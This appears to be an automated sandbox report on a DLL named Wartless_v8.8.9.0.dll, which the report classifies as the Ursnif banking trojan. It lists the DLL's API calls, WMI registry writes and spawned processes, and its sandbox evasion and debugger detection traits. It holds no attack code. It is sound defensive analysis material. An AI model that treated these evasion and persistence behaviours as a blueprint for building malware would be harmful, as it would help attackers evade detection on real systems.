Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04444872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

System Summary

Writes or reads registry keys via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: Wartless_v8.8.9.0.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_10002244
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_010C81DC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_010C6C62
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_010C4EF3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_04F94EF3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_04F96C62
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_04F981DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_03690DF9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_03690DF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04216C62
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04214EF3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_042181DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04446C62
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04444EF3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_044481DC

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_100012BE NtMapViewOfSection,
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_10001F61 GetProcAddress,NtCreateSection,memset,
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_10001077 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_10002465 NtQueryVirtualMemory,
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_010C77BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_010C8401 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_04F977BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_04F98401 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_03690AB8 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_03690880 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_042177BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04218401 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_044477BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04448401 NtQueryVirtualMemory,

Source: Wartless_v8.8.9.0.dll	Binary or memory string: OriginalFilenameWartless4 vs Wartless_v8.8.9.0.dll
Source: Wartless_v8.8.9.0.dll	Binary or memory string: OriginalFilenameRaCertMg.dll\ vs Wartless_v8.8.9.0.dll

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Source: Wartless_v8.8.9.0.dll	Virustotal: Detection: 19%
Source: Wartless_v8.8.9.0.dll	ReversingLabs: Detection: 13%

Source: Wartless_v8.8.9.0.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Wartless_v8.8.9.0.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Wartless_v8.8.9.0.dll,DllRegisterServer
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17414 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:82946 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17418 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17416 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:82946 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:148484 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17414 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:82946 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:214018 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17416 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:148482 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:214018 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Wartless_v8.8.9.0.dll
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Wartless_v8.8.9.0.dll,DllRegisterServer
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17414 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:82946 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17418 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17416 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:82946 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:148484 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17414 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:82946 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:214018 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17416 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:148482 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:214018 /prefetch:2

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF854BAA01E360BD39.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winDLL@45/99@38/10

Source: C:\Windows\System32\loaddll32.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_010C2AB4 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1

Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: Wartless_v8.8.9.0.dll	Static PE information: More than 200 imports for gdi32.dll
Source: Wartless_v8.8.9.0.dll	Static PE information: More than 200 imports for user32.dll

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_10002233 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_100021E0 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_010C81CB push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_010C7DE0 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_04F97DE0 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_04F981CB push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_03690BFC push dword ptr [esp+0Ch]; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_03690BFC push dword ptr [esp+10h]; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_036905DF push dword ptr [ebp-00000284h]; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_03690A64 push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_03690A64 push dword ptr [esp+10h]; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_036906F5 push dword ptr [ebp-00000284h]; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_03690AB8 push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_03690880 push dword ptr [ebp-00000284h]; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04217DE0 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_042181CB push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_044481CB push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04447DE0 push ecx; ret

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_10001BE8 LoadLibraryA,GetProcAddress,

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Wartless_v8.8.9.0.dll

Hooking and other Techniques for Hiding and Protection

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000003.349703615.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343910189.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349753525.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348956479.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.344026783.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343809632.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.503813220.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348909317.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.691343134.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350624974.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350468495.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.813030577.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349673542.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343983183.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343884833.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.811764188.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349765761.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343969010.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.811066205.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350524992.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349774706.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350610044.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349722283.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.505253975.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350578118.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348881206.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348997305.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350596775.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343764685.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350398147.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343941350.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349738190.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349603405.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350426132.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.349008394.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.502184053.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.811636892.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348935901.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348822890.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348974214.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 7132, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6460, type: MEMORYSTR

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking system information)

Source: C:\Windows\System32\loaddll32.exe

Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7100	Thread sleep time: -1773297476s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7100	Thread sleep count: 76 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7100	Thread sleep time: -38000s >= -30000s

Source: C:\Windows\SysWOW64\rundll32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\loaddll32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.810669617.00000000034E5000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW,
Source: regsvr32.exe, 00000005.00000002.810669617.00000000034E5000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWyb
Source: loaddll32.exe, 00000001.00000002.809655751.000000000112F000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW@

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Windows\System32\loaddll32.exe

Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_10001BE8 LoadLibraryA,GetProcAddress,

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_03690B14 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_03690BFC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_03690A64 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_03690C57 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_03690CE8 mov eax, dword ptr fs:[00000030h]

HIPS / PFW / Operating System Protection Evasion

